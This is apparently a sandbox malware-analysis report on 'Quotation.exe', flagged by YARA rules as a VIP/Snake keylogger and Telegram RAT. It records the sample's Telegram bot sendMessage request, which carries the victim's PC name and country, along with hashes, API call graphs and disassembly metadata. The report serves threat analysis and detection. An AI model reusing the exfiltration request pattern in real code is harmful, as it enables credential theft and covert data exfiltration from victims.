                                                  2024-10-07 08:13:41 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20and%20Time:%2007/10/2024%20/%2015:28:53%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20377142%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                  Host: api.telegram.org
                                                  Connection: Keep-Alive
                                                  2024-10-07 08:13:41 UTC344INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.18.0
                                                  Date: Mon, 07 Oct 2024 08:13:41 GMT
                                                  Content-Type: application/json
                                                  Content-Length: 55
                                                  Connection: close
                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                  Access-Control-Allow-Origin: *
                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                  2024-10-07 08:13:41 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                  Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                  Click to jump to process

                                                  Click to jump to process

                                                  Click to dive into process behavior distribution

                                                  Target ID:0
                                                  Start time:04:13:26
                                                  Start date:07/10/2024
                                                  Path:C:\Users\user\Desktop\Quotation.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\Quotation.exe"
                                                  Imagebase:0x450000
                                                  File size:276'992 bytes
                                                  MD5 hash:F485D8C73BCC8AC6AB3F432F2258D030
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.4104956397.0000000002B0E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.1633838435.0000000000452000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000000.1633838435.0000000000452000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.1633838435.0000000000452000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000000.1633838435.0000000000452000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.4104956397.0000000002991000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low
                                                  Has exited:false

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:15.4%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:79
                                                    Total number of Limit Nodes:8
                                                    execution_graph 20076 a6d044 20077 a6d05c 20076->20077 20078 a6d0b6 20077->20078 20081 5e50c4 20077->20081 20089 5e72a8 20077->20089 20082 5e50cf 20081->20082 20083 5e8069 20082->20083 20085 5e8059 20082->20085 20110 5e51ec 20083->20110 20093 5e825c 20085->20093 20101 5e8190 20085->20101 20086 5e8067 20090 5e72ce 20089->20090 20091 5e50c4 3 API calls 20090->20091 20092 5e72ef 20091->20092 20092->20078 20094 5e821a 20093->20094 20095 5e826a 20093->20095 20096 5e8225 20094->20096 20123 5e524c CallWindowProcW CallWindowProcW CallWindowProcW 20094->20123 20117 5e8248 20096->20117 20120 5e8238 20096->20120 20098 5e8230 20098->20086 20102 5e81a4 20101->20102 20104 5e81be 20101->20104 20107 5e81ab 20102->20107 20128 5e524c CallWindowProcW CallWindowProcW CallWindowProcW 20102->20128 20104->20107 20127 5e51f1 CallWindowProcW CallWindowProcW CallWindowProcW 20104->20127 20105 5e8230 20105->20086 20108 5e8248 3 API calls 20107->20108 20109 5e8238 3 API calls 20107->20109 20108->20105 20109->20105 20111 5e51f1 20110->20111 20112 5e979c 20111->20112 20113 5e96f2 20111->20113 20114 5e50c4 2 API calls 20112->20114 20115 5e974a CallWindowProcW 20113->20115 20116 5e96f9 20113->20116 20114->20116 20115->20116 20116->20086 20118 5e8259 20117->20118 20124 5e9682 20117->20124 20118->20098 20121 5e8259 20120->20121 20122 5e9682 3 API calls 20120->20122 20121->20098 20122->20121 20123->20096 20125 5e51ec 3 API calls 20124->20125 20126 5e969a 20125->20126 20126->20118 20127->20107 20128->20107 20129 5eb878 20130 5eb8cc 20129->20130 20131 5eb8a0 20129->20131 20132 5eb8a9 20131->20132 20134 5eaddc 20131->20134 20135 5eade7 20134->20135 20137 5ebbc3 20135->20137 20138 5eadf8 20135->20138 20137->20130 20139 5ebbf8 OleInitialize 20138->20139 20140 5ebc5c 20139->20140 20140->20137 20141 5e4840 20143 5e4871 20141->20143 20145 5e4971 20141->20145 20142 5e487d 20143->20142 20150 5e4ab8 20143->20150 20153 5e4aa8 20143->20153 20144 5e48bd 20156 5e61b8 20144->20156 20160 5e6171 20144->20160 20165 5e4af8 20150->20165 20151 5e4ac2 20151->20144 20154 5e4ac2 20153->20154 20155 5e4af8 GetModuleHandleW 20153->20155 20154->20144 20155->20154 20157 5e61e3 20156->20157 20158 5e6292 20157->20158 20170 5e70a0 20157->20170 20161 5e617a 20160->20161 20162 5e61b3 20160->20162 20161->20145 20163 5e6292 20162->20163 20164 5e70a0 CreateWindowExW 20162->20164 20164->20163 20167 5e4b09 20165->20167 20166 5e4b3c 20166->20151 20167->20166 20168 5e4d40 GetModuleHandleW 20167->20168 20169 5e4d6d 20168->20169 20169->20151 20173 5e509c 20170->20173 20174 5e70f0 CreateWindowExW 20173->20174 20176 5e7214 20174->20176
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e10256a694abd90049cb9ba15732f0cc586877727c4b00bf2069eddf750a28c8
                                                    • Instruction ID: c345c7c38fb23023c63dcb28bf33b58c65acc145fa945675d07382e316cdf548
                                                    • Opcode Fuzzy Hash: e10256a694abd90049cb9ba15732f0cc586877727c4b00bf2069eddf750a28c8
                                                    • Instruction Fuzzy Hash: 5C828E71A00219DFCB15CFA8E984AAEBBF2FF88310F15855AE4159B661D730ED81CF52
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e3d75fe2937a0a49c7224bc52173d3770a607525c389dbd89138087f4b4af8ad
                                                    • Instruction ID: 5c1417ccbbe7ce9d5bf6806462ed077672bd7afe887a691ca82bb7b075467526
                                                    • Opcode Fuzzy Hash: e3d75fe2937a0a49c7224bc52173d3770a607525c389dbd89138087f4b4af8ad
                                                    • Instruction Fuzzy Hash: A4128E70B002199FDB14DFA9E954BAEBBF2BF88300F248569E815DB791DB309D45CB90
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 22583fc6b1c230b9d60afe7cde65213d37121cf4fd1263607d7020abeefb205d
                                                    • Instruction ID: f31c965b333859bc279b4e0bbff29454f23d1120e95844e3c3da762e9b5c7826
                                                    • Opcode Fuzzy Hash: 22583fc6b1c230b9d60afe7cde65213d37121cf4fd1263607d7020abeefb205d
                                                    • Instruction Fuzzy Hash: 60126030A04229DFCB15DFA9E984AADBBF2BF88300F258169E815EB661D734DD41CF51
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4103379100.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5e0000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1562db593a38bc51fe97ec76deb65122615fa321ac02e63ba8676166b46e12ad
                                                    • Instruction ID: 0a795f735d780ea8fb549ba9f20076ceaad65191e14625e0d3a4af1c98410067
                                                    • Opcode Fuzzy Hash: 1562db593a38bc51fe97ec76deb65122615fa321ac02e63ba8676166b46e12ad
                                                    • Instruction Fuzzy Hash: 8DA1BD35E0035ECFCB05DFA5D854AEDBBB6FF89310F248656E405AB2A1DB30A985CB50
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cdde2cac3159bda8c48459624235fd612ceccb403b9444cffa206607f546c2f8
                                                    • Instruction ID: ee44c447421dc4b120f5beb63bbe1f423b85e3ab38c8ee04fed9d0f17fd1aa5d
                                                    • Opcode Fuzzy Hash: cdde2cac3159bda8c48459624235fd612ceccb403b9444cffa206607f546c2f8
                                                    • Instruction Fuzzy Hash: 13A1E475E04218DFEB14DFAAD884A9DBBF2BF89310F14C16AE419AB361DB309945CF50
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e011d5e6cbd8060d57de6cfc8155e5b5503b14495b761e67c67bd682822c2b4e
                                                    • Instruction ID: 59c49329032493d533e662767f2ce73452c477059ce490a8c3b2b1af2980e462
                                                    • Opcode Fuzzy Hash: e011d5e6cbd8060d57de6cfc8155e5b5503b14495b761e67c67bd682822c2b4e
                                                    • Instruction Fuzzy Hash: D391D674E00658CFDB14DFA9D984A9EBBF2BF89301F24C069D819AB265DB309985CF50
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5335bccb9e458b29abe00340fee77b9b1c7687dea785825feb2b6047bcbbf5a9
                                                    • Instruction ID: 94877934d29620138181e47c06dc1bca293991bd26a88431be132ab08c079918
                                                    • Opcode Fuzzy Hash: 5335bccb9e458b29abe00340fee77b9b1c7687dea785825feb2b6047bcbbf5a9
                                                    • Instruction Fuzzy Hash: B091C774E00258CFDB14DFAAD884A9DBBF2BF89300F24C069E819AB365DB309945DF51
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a5896c821f3966e1ca487c6ad2c7c6f91385fa564b7a058510b86ca82c6d8274
                                                    • Instruction ID: 6ec415e6a54366261e013f83f596c33041e3bcdda6681c9c3e5b557fd6e58cf3
                                                    • Opcode Fuzzy Hash: a5896c821f3966e1ca487c6ad2c7c6f91385fa564b7a058510b86ca82c6d8274
                                                    • Instruction Fuzzy Hash: D581B674E00218DFEB14DFAAD984A9DBBF2BF88300F14C169E419AB365DB309945DF51
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e401adfb73331e03ecf8b91eca7806f4579b939a646eeea3e27574bd1ea3a29a
                                                    • Instruction ID: 004ffcc8ec6bb5222b7eb1c7506b4ef1ee8ca62943e6ee2a44a74be6091af60d
                                                    • Opcode Fuzzy Hash: e401adfb73331e03ecf8b91eca7806f4579b939a646eeea3e27574bd1ea3a29a
                                                    • Instruction Fuzzy Hash: 4D81A674E00218CFEB14DFAAD944A9DBBF2BF99300F24C069D419AB765DB309945CF51
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cc04b82e9c58b158cda760d2314d137fcdf2ffc97e28348f02aa051a263be886
                                                    • Instruction ID: 2aad6498a23e929358b020cf33dd0e097175b2b9335e1a99471aa67ea0939ec0
                                                    • Opcode Fuzzy Hash: cc04b82e9c58b158cda760d2314d137fcdf2ffc97e28348f02aa051a263be886
                                                    • Instruction Fuzzy Hash: 4481B574E00218DFEB14DFAAD984A9DBBF2BF89300F24C069E419AB365DB305985CF51
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 29bf01499d9e7e9254b1bc789accbf10524e1dfca1600ef67011a8c6309a7dc5
                                                    • Instruction ID: 4ccddcd0227f91e11d5427d2fd6dd6198c4ea5e896a2c586e2e4735d21d22798
                                                    • Opcode Fuzzy Hash: 29bf01499d9e7e9254b1bc789accbf10524e1dfca1600ef67011a8c6309a7dc5
                                                    • Instruction Fuzzy Hash: B4819574E00218DFEB14DFAAD984A9DBBF2BF88300F24C069D419AB765DB319985CF51
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 45a162d7ccdfb573c488c242aec2163e6214024e2bfa8c6fed92d2168b465dc1
                                                    • Instruction ID: 436116e01c3583bfba129c51cbc1ef7ae110197a0037182678ce2ebd1b8725e6
                                                    • Opcode Fuzzy Hash: 45a162d7ccdfb573c488c242aec2163e6214024e2bfa8c6fed92d2168b465dc1
                                                    • Instruction Fuzzy Hash: B081A675E00218CFEB18DFAAD984A9DBBF2BF88310F14C069E419AB765DB309945DF50
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4a30973be227198f7780506da9dba7c99ece01c6a4505ce3a89190f9444b2182
                                                    • Instruction ID: e09007e99cee35e921d76c0c2d6dc5a270766fa15ce5287b473a6de06876a216
                                                    • Opcode Fuzzy Hash: 4a30973be227198f7780506da9dba7c99ece01c6a4505ce3a89190f9444b2182
                                                    • Instruction Fuzzy Hash: 80518374E00318DFDB18DFAAD894A9DBBB2BF89710F248129E815AB364DB305941CF54
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 66e41aed28cb10f74d9c98ac86b88d4a3f9683c8388bf6469b652d3c3526bba7
                                                    • Instruction ID: 13fa9c187af1410919baffaf73449cc8379b9939c09d8233ccdc6a521c895abe
                                                    • Opcode Fuzzy Hash: 66e41aed28cb10f74d9c98ac86b88d4a3f9683c8388bf6469b652d3c3526bba7
                                                    • Instruction Fuzzy Hash: 11519474E00218DFDB18DFAAD894A9DBBB2BF89700F24C12AE815AB365DB315941CF14

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 5e4af8-5e4b17 2 5e4b19-5e4b26 call 5e3ac0 0->2 3 5e4b43-5e4b47 0->3 8 5e4b3c 2->8 9 5e4b28 2->9 5 5e4b5b-5e4b9c 3->5 6 5e4b49-5e4b53 3->6 12 5e4b9e-5e4ba6 5->12 13 5e4ba9-5e4bb7 5->13 6->5 8->3 55 5e4b2e call 5e4da0 9->55 56 5e4b2e call 5e4d91 9->56 12->13 14 5e4bdb-5e4bdd 13->14 15 5e4bb9-5e4bbe 13->15 20 5e4be0-5e4be7 14->20 17 5e4bc9 15->17 18 5e4bc0-5e4bc7 call 5e3acc 15->18 16 5e4b34-5e4b36 16->8 19 5e4c78-5e4d38 16->19 22 5e4bcb-5e4bd9 17->22 18->22 50 5e4d3a-5e4d3d 19->50 51 5e4d40-5e4d6b GetModuleHandleW 19->51 23 5e4be9-5e4bf1 20->23 24 5e4bf4-5e4bfb 20->24 22->20 23->24 26 5e4bfd-5e4c05 24->26 27 5e4c08-5e4c11 24->27 26->27 31 5e4c1e-5e4c23 27->31 32 5e4c13-5e4c1b 27->32 33 5e4c25-5e4c2c 31->33 34 5e4c41-5e4c4e 31->34 32->31 33->34 36 5e4c2e-5e4c3e call 5e393c call 5e3adc 33->36 41 5e4c50-5e4c6e 34->41 42 5e4c71-5e4c77 34->42 36->34 41->42 50->51 52 5e4d6d-5e4d73 51->52 53 5e4d74-5e4d88 51->53 52->53 55->16 56->16
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 005E4D5E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4103379100.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5e0000_Quotation.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: b790dce7b485930efb397ba306d8d64e003cdb9550fff9ecc8da7761979906a6
                                                    • Instruction ID: 8632b026d7f67a35039ae42c35ba3e21fb627f79fdd943cbeb6082170b3de100
                                                    • Opcode Fuzzy Hash: b790dce7b485930efb397ba306d8d64e003cdb9550fff9ecc8da7761979906a6
                                                    • Instruction Fuzzy Hash: 6F813670A00B858FDB28CF2AD54479ABBF1BF88300F108A2ED48AD7A50D774E945CF91

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 57 5e509c-5e7156 59 5e7158-5e715e 57->59 60 5e7161-5e7168 57->60 59->60 61 5e716a-5e7170 60->61 62 5e7173-5e7212 CreateWindowExW 60->62 61->62 64 5e721b-5e7253 62->64 65 5e7214-5e721a 62->65 69 5e7255-5e7258 64->69 70 5e7260 64->70 65->64 69->70 71 5e7261 70->71 71->71
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 005E7202
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4103379100.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5e0000_Quotation.jbxd
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: 78bae4ca4e928d0f251f0e7d0bae1a5b289b2571da369b42202f6d72500dfba9
                                                    • Instruction ID: 6e3dc2956108a416e85550869f4d39915e0c4c4314322e28ca7665481a01783c
                                                    • Opcode Fuzzy Hash: 78bae4ca4e928d0f251f0e7d0bae1a5b289b2571da369b42202f6d72500dfba9
                                                    • Instruction Fuzzy Hash: B151BCB5D04349DFDB18CF9AC884A9EBBB5BF48310F24852AE819AB210D7759845CF90

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 72 5e51ec-5e96ec 76 5e979c-5e97bc call 5e50c4 72->76 77 5e96f2-5e96f7 72->77 84 5e97bf-5e97cc 76->84 79 5e974a-5e9782 CallWindowProcW 77->79 80 5e96f9-5e9730 77->80 81 5e978b-5e979a 79->81 82 5e9784-5e978a 79->82 86 5e9739-5e9748 80->86 87 5e9732-5e9738 80->87 81->84 82->81 86->84 87->86
                                                    APIs
                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 005E9771
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4103379100.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5e0000_Quotation.jbxd
                                                    Similarity
                                                    • API ID: CallProcWindow
                                                    • String ID:
                                                    • API String ID: 2714655100-0
                                                    • Opcode ID: e96b2af9f05f704fa76d5668086ab2724eb7b70934e8ef2ef908d054de9c6255
                                                    • Instruction ID: 7639686565916f1776b0a2d6f2e8114bbe97087d444d24b2cc302422ede27e0e
                                                    • Opcode Fuzzy Hash: e96b2af9f05f704fa76d5668086ab2724eb7b70934e8ef2ef908d054de9c6255
                                                    • Instruction Fuzzy Hash: 67417CB9900345CFDB14CF9AC448AAABBF5FF89314F24C458D559AB361D370A844CFA0

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 90 5ebc91-5ebc95 91 5ebc97-5ebd06 90->91 92 5ebc34-5ebc3a 90->92 98 5ebd0f-5ebd23 91->98 99 5ebd08-5ebd0e 91->99 94 5ebc3c-5ebc3e 92->94 95 5ebc40-5ebc43 92->95 94->95 97 5ebc49-5ebc5a OleInitialize 95->97 100 5ebc5c-5ebc62 97->100 101 5ebc63-5ebc80 97->101 99->98 100->101
                                                    APIs
                                                    • OleInitialize.OLE32(00000000), ref: 005EBC4D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4103379100.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5e0000_Quotation.jbxd
                                                    Similarity
                                                    • API ID: Initialize
                                                    • String ID:
                                                    • API String ID: 2538663250-0
                                                    • Opcode ID: 103878477a1da0f30b499fe9f62b2a89ba741a128b0198973a254867dc5ef5a3
                                                    • Instruction ID: 273f6898696843bcdd3e2f1012d3a531aa8d5839751b35d6cc1c107dd3165349
                                                    • Opcode Fuzzy Hash: 103878477a1da0f30b499fe9f62b2a89ba741a128b0198973a254867dc5ef5a3
                                                    • Instruction Fuzzy Hash: B4318B75C046898FDB10CFAAD4447CEFFF0EB48310F24845AD499A7251D3796545CFA1

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 105 5ebbf1-5ebbf5 106 5ebbf7-5ebc5a OleInitialize 105->106 107 5ebb94 105->107 109 5ebc5c-5ebc62 106->109 110 5ebc63-5ebc80 106->110 109->110
                                                    APIs
                                                    • OleInitialize.OLE32(00000000), ref: 005EBC4D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4103379100.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5e0000_Quotation.jbxd
                                                    Similarity
                                                    • API ID: Initialize
                                                    • String ID:
                                                    • API String ID: 2538663250-0
                                                    • Opcode ID: 58eb2569e15030e348826eb03cec9bae1ae19f112dd174efd5deaf35c6ef4324
                                                    • Instruction ID: 561ee1f7adb7c36530f7b07f3869755abe712fe42a854763423bc9e5f1410cdf
                                                    • Opcode Fuzzy Hash: 58eb2569e15030e348826eb03cec9bae1ae19f112dd174efd5deaf35c6ef4324
                                                    • Instruction Fuzzy Hash: B41156B5904289CFDB24CF9AD444BDEBFF4EB88321F24845AD548A7210C374A944CFA1

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 113 5e4cf8-5e4d38 114 5e4d3a-5e4d3d 113->114 115 5e4d40-5e4d6b GetModuleHandleW 113->115 114->115 116 5e4d6d-5e4d73 115->116 117 5e4d74-5e4d88 115->117 116->117
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 005E4D5E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4103379100.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5e0000_Quotation.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: 9b965a935744d88aa6101287667c0d445ae2d7160443c22ad8cb4e4588169aea
                                                    • Instruction ID: e2f7a1c49052ecda8f55be5e0e8356c16b4fb10a63793794e18b4f67f38a04d7
                                                    • Opcode Fuzzy Hash: 9b965a935744d88aa6101287667c0d445ae2d7160443c22ad8cb4e4588169aea
                                                    • Instruction Fuzzy Hash: 68110FB6C00649CFDB24CF9AD844A9EFBF4AB88310F10841AD858A7200C379A545CFA1

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 119 5eadf8-5ebc5a OleInitialize 121 5ebc5c-5ebc62 119->121 122 5ebc63-5ebc80 119->122 121->122
                                                    APIs
                                                    • OleInitialize.OLE32(00000000), ref: 005EBC4D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4103379100.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5e0000_Quotation.jbxd
                                                    Similarity
                                                    • API ID: Initialize
                                                    • String ID:
                                                    • API String ID: 2538663250-0
                                                    • Opcode ID: 67cdd5aac945966c4af6b767bfe5bbe045aed345120ee28d1868662def4b1157
                                                    • Instruction ID: c6c0ad5f5578e563e1f3f971deab828c4f85b36ab40bb5742ccba749aef0d90b
                                                    • Opcode Fuzzy Hash: 67cdd5aac945966c4af6b767bfe5bbe045aed345120ee28d1868662def4b1157
                                                    • Instruction Fuzzy Hash: FA1133B5800749CFDB20DF9AD844B9EBBF8EB48310F208459D558A7300C378A940CFA5

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 420 c28490-c2897e 495 c28ed0-c28eea 420->495 496 c28984-c28994 420->496 501 c28eee-c28f05 495->501 502 c28eec 495->502 496->495 497 c2899a-c289aa 496->497 497->495 498 c289b0-c289c0 497->498 498->495 500 c289c6-c289d6 498->500 500->495 503 c289dc-c289ec 500->503 504 c28f11-c28f2f 501->504 505 c28f07-c28f0c 501->505 502->501 503->495 506 c289f2-c28a02 503->506 516 c28f31-c28f3b 504->516 517 c28fa6-c28fb2 504->517 507 c28ff6-c28ffb 505->507 506->495 509 c28a08-c28a18 506->509 509->495 510 c28a1e-c28a2e 509->510 510->495 512 c28a34-c28a44 510->512 512->495 513 c28a4a-c28a5a 512->513 513->495 515 c28a60-c28ecf 513->515 516->517 521 c28f3d-c28f49 516->521 522 c28fb4-c28fc0 517->522 523 c28fc9-c28fd5 517->523 532 c28f4b-c28f56 521->532 533 c28f6e-c28f71 521->533 522->523 529 c28fc2-c28fc7 522->529 530 c28fd7-c28fe3 523->530 531 c28fec-c28fee 523->531 529->507 530->531 543 c28fe5-c28fea 530->543 531->507 532->533 545 c28f58-c28f62 532->545 535 c28f73-c28f7f 533->535 536 c28f88-c28f94 533->536 535->536 546 c28f81-c28f86 535->546 538 c28f96-c28f9d 536->538 539 c28ffc-c2900a 536->539 538->539 544 c28f9f-c28fa4 538->544 550 c2900e-c2901e 539->550 551 c2900c 539->551 543->507 544->507 545->533 554 c28f64-c28f69 545->554 546->507 552 c29020 550->552 553 c2902e 550->553 551->550 552->553 555 c29027-c2902c 552->555 556 c29030-c29031 553->556 554->507 555->556
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
